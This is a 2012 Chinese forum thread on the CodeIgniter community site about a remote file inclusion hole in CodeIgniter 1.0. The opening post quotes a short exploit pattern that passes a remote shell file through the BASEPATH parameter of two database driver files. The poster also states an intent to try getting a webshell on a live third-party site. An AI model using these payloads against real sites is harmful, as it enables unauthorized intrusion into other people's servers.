CodeIgniter的1.0远程文件包含漏洞

咕噜哈℡ · 发表于 2012-3-12 10:03:50

本帖最后由咕噜哈℡ 于 2012-3-12 11:27 编辑

有人知道这个漏洞吗？是如何利用的。

###########################################################
### Exploit: /system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
### /system/database/DB_driver.php?BASEPATH=[Shell.txt?]
###########################################################

Hex · 发表于 2012-3-12 10:41:51

1.0 ？
这个貌似是开启PHP全局变量的一个选项才会被攻击。。。

咕噜哈℡ · 发表于 2012-3-12 10:45:36

Hex 发表于 2012-3-12 10:41
1.0 ？
这个貌似是开启PHP全局变量的一个选项才会被攻击。。。

1.0 已知比较严重的漏洞都有哪些呢？？

Hex · 发表于 2012-3-12 10:47:00

咕噜哈℡ 发表于 2012-3-12 10:45
1.0 已知比较严重的漏洞都有哪些呢？？

现在都是 2.1.0 了。。。谁还用 1.0 啊？
据我所知 CI 没什么漏洞，因为他是框架，他不是CMS。。。

咕噜哈℡ · 发表于 2012-3-12 10:52:17

Hex 发表于 2012-3-12 10:47
现在都是 2.1.0 了。。。谁还用 1.0 啊？
据我所知 CI 没什么漏洞，因为他是框架，他不是CMS。。。 ...

我找到一个网站，用的还是1.0

我就是想试试，看看1.0能不能获得webshell 已知的漏洞挺多的，CodeIgniter 跨站脚本漏洞，CodeIgniter 函数注入漏洞，CodeIgniter 目录遍历漏洞……

Hex · 发表于 2012-3-12 11:45:15

咕噜哈℡ 发表于 2012-3-12 10:52
我找到一个网站，用的还是1.0 我就是想试试，看看1.0能不能获得webshell 已知的漏洞挺多的，CodeIgnit ...

这些漏洞都不太可能，框架这个要看开发者是不是会写有漏洞的代码。
你可以试试 CI 中国，看看是否可以攻击，呵呵

		自动登录	找回密码
密码			入住 CI 中国社区

[讨论/交流] CodeIgniter的1.0远程文件包含漏洞